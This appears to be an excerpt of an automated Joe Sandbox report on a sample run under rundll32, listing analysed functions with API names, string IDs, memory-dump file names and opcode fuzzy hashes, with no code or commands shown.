                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                      • Opcode ID: 43b698f3bd72d782d1a4c4367ab40e0fd6e179516ccf90768e29b969fcb783f7
                                                                                                                                                                                                                                                                      • Instruction ID: 586806abb7160c1286a1b2c9858a8c81ad64b0ece563cba21c458cc6968070c5
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43b698f3bd72d782d1a4c4367ab40e0fd6e179516ccf90768e29b969fcb783f7
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21110C30604E0949FADB637144A67FD11417F8D3FEF1ACB24B836062D2EE289B096789
                                                                                                                                                                                                                                                                      Function 000000018000D56C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                                      • Opcode ID: 09b6cd871ff89506528b68077a13dcbbaff50fd9b0353c15b1e87b0f63462aad
                                                                                                                                                                                                                                                                      • Instruction ID: 603ec2f23fa6d6c6a25bd3aeda4f846d3f0b7b81b5b2ff33ca2fe6bf8accc470
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09b6cd871ff89506528b68077a13dcbbaff50fd9b0353c15b1e87b0f63462aad
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63917F73614B888AE792DB65E8903DD7BA0F3497C8F14811AFB8957755DF38C299CB00
                                                                                                                                                                                                                                                                      Function 000000018000D2FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                                      • Opcode ID: 087e7b3c63a88a435a2e6d937ad598ea21859f3271ec1f8e9716eed55fe6bc31
                                                                                                                                                                                                                                                                      • Instruction ID: dfb6a33e339ab0c6007a7a63b5c9da813757f51a8917a400a443b559987f5a56
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 087e7b3c63a88a435a2e6d937ad598ea21859f3271ec1f8e9716eed55fe6bc31
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43615032508BC886E7A2DF15E4407DAB7A0F7897D8F048216FB9857B95DF78D298CB10
                                                                                                                                                                                                                                                                      Function 000000018000DAEC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                                      • Opcode ID: 5368d8b1d24fe0368cc4e10c75a835cf7b4598258ec1be9622bc0c1957234e7a
                                                                                                                                                                                                                                                                      • Instruction ID: 8344979c66b9cceb0b7acf630f590e38be3bd2ff735d44e9d3a026d285abadf4
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5368d8b1d24fe0368cc4e10c75a835cf7b4598258ec1be9622bc0c1957234e7a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7518A3210468C8AEBA6CF2594447A977A0F358BC4F14C127FB8947BD5CF78D668CB11
                                                                                                                                                                                                                                                                      Function 00000001800117A4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: NameName::snprintfswprintf
                                                                                                                                                                                                                                                                      • String ID: %lf
                                                                                                                                                                                                                                                                      • API String ID: 3974891382-2891890143
                                                                                                                                                                                                                                                                      • Opcode ID: 7fc1947d49ae169c503500e1267cacb441c981dc534258eb13393c19efbd0a35
                                                                                                                                                                                                                                                                      • Instruction ID: 1d1499fd28cd0defdd0e894b6a29d0ba661b97baa627992bc5e4fd3905ed2300
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7fc1947d49ae169c503500e1267cacb441c981dc534258eb13393c19efbd0a35
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C01A221614B9840FB929B25B8013DBA361BF9A7C4F54C322BE5967B65DE2CC2578700
                                                                                                                                                                                                                                                                      Function 0000000180011834 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: NameName::snprintfswprintf
                                                                                                                                                                                                                                                                      • String ID: %lf
                                                                                                                                                                                                                                                                      • API String ID: 3974891382-2891890143
                                                                                                                                                                                                                                                                      • Opcode ID: 43343db7a5785d265fd779c02874dbd2acc63c014a2a9ae2f7173fd214bdd341
                                                                                                                                                                                                                                                                      • Instruction ID: e8046b89d42cedcdfa3f71cef9b3097e4d32cbc59f7538c484cb4a0ec4f8bfae
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43343db7a5785d265fd779c02874dbd2acc63c014a2a9ae2f7173fd214bdd341
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AF08631614BD890FB569B25B8013DBA361BF997C4F54C321BE5957B65CE3CC2578700
                                                                                                                                                                                                                                                                      Function 000001FF4B0A26B0 Relevance: 6.4, APIs: 5, Instructions: 132COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4B0A0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3332368718.000001FF4B0E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4b0a0000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                      • Opcode ID: 50d4aa64397910f34370dcdd3f25db7b3cd1b44d2d627c561aa8e3d7ca6c4d4e
                                                                                                                                                                                                                                                                      • Instruction ID: a25e42b91df9d125d56c0d0429a068c227a1ca83c202503d3eae4a04a1f8034e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50d4aa64397910f34370dcdd3f25db7b3cd1b44d2d627c561aa8e3d7ca6c4d4e
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5510A32619B4986DB64CB09E49436AB7A0FB9CB85F140939FB8E877A5DB7CC441CB04
                                                                                                                                                                                                                                                                      Function 0000000180056664 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,000000018001AF96,?,?,000000018001AF96,000000018001AF96,?,000000018001AF96,000000018001AF96,0000000180056604), ref: 0000000180056787
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,000000018001AF96,?,?,000000018001AF96,000000018001AF96,?,000000018001AF96,000000018001AF96,0000000180056604), ref: 0000000180056811
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 953036326-0
                                                                                                                                                                                                                                                                      • Opcode ID: b2a80129a009847c2ce996616dbbe413a05851c68b0ba3fa64774bcca3876923
                                                                                                                                                                                                                                                                      • Instruction ID: 1260cb0f68ca8a8ce6bcd19fd34b1b076e826746dc0d6dce6279d08af0310b67
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2a80129a009847c2ce996616dbbe413a05851c68b0ba3fa64774bcca3876923
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E991E472F14A5885FBA2CB6594407ED2BA4F34CBD8F448205FE4A776A5CF36C68AC710
                                                                                                                                                                                                                                                                      Function 0000000180014FCC Relevance: 6.2, APIs: 4, Instructions: 193COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2943138195-0
                                                                                                                                                                                                                                                                      • Opcode ID: 833d5f12b3745b43fcb298177fc6e3fb40fcfb7b31867bf43b28185f1c8aef01
                                                                                                                                                                                                                                                                      • Instruction ID: be38e034833b563642ed2c4684e659858a25fcc5f3f681f84aaac44cdb52407b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 833d5f12b3745b43fcb298177fc6e3fb40fcfb7b31867bf43b28185f1c8aef01
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D915D77A00B98C9FB938BA4D8403DC37B1B30D789F65C015EE892B695DF798A49C741
                                                                                                                                                                                                                                                                      Function 0000000273F41010 Relevance: 6.1, APIs: 4, Instructions: 107sleepCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3331451655.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331409929.0000000273F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331451655.0000000273F85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Sleep_amsg_exit
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1015461914-0
                                                                                                                                                                                                                                                                      • Opcode ID: 1aa7096d3279892f89bb6938d1e8f798873b932fab0900364294d29769eafb3e
                                                                                                                                                                                                                                                                      • Instruction ID: b36ed253b1f92ff08f278adfa0ead6049e2a2874eebc081211355efa6209b103
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1aa7096d3279892f89bb6938d1e8f798873b932fab0900364294d29769eafb3e
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08417C31E0CA4885F765DB1AEC497AA2395B784BE4F744025DE0C87FA1EE28CA40B343
                                                                                                                                                                                                                                                                      Function 0000000180017CB4 Relevance: 6.1, APIs: 4, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3863519203-0
                                                                                                                                                                                                                                                                      • Opcode ID: ab40c895ed32f951a42b94f9895b2f8f6206b0eb416bcb5b27eecb077ca5f57b
                                                                                                                                                                                                                                                                      • Instruction ID: 4055e878f64a0d4d9d529e2badb35a1d8728a1b9fc24d6f266f1b5ddb2a3fbf8
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab40c895ed32f951a42b94f9895b2f8f6206b0eb416bcb5b27eecb077ca5f57b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A412576A00B8899EB42CFA4E8403EC37B0F748B98F64C415EE495B79ADF78C649C750
                                                                                                                                                                                                                                                                      Function 000000018000DD24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: __except_validate_context_record
                                                                                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                                                                                      • API String ID: 1467352782-3733052814
                                                                                                                                                                                                                                                                      • Opcode ID: 1f78ce30d5d3abf011c49c12d0b77ceb6a2fa33deb273aa3e414b84e124295c9
                                                                                                                                                                                                                                                                      • Instruction ID: 9c4d39e4c652f3945ef35df7601ed0ac793b78f7d53c8ab04d9db08b0d63a189
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f78ce30d5d3abf011c49c12d0b77ceb6a2fa33deb273aa3e414b84e124295c9
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B27191721046888ADBA2DF25D4507ADBBA0F348BC9F14C126FB8947B89CF38C699C751
                                                                                                                                                                                                                                                                      Function 000000018000A630 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Unwind__except_validate_context_record
                                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                                      • API String ID: 2208346422-1018135373
                                                                                                                                                                                                                                                                      • Opcode ID: 41b12dda0e093764b089897d1ff21e540db28dc560569149afab03f8e9fdc7c2
                                                                                                                                                                                                                                                                      • Instruction ID: 2672bec40da291ce11c6250c0dad722d8f4cfd31cfcba8b085e74eb73a93bdbb
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41b12dda0e093764b089897d1ff21e540db28dc560569149afab03f8e9fdc7c2
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC51F7323196088AFB96CF15E844BAD33A5F749BC8F50C121FA4A47789EF79CA49C700
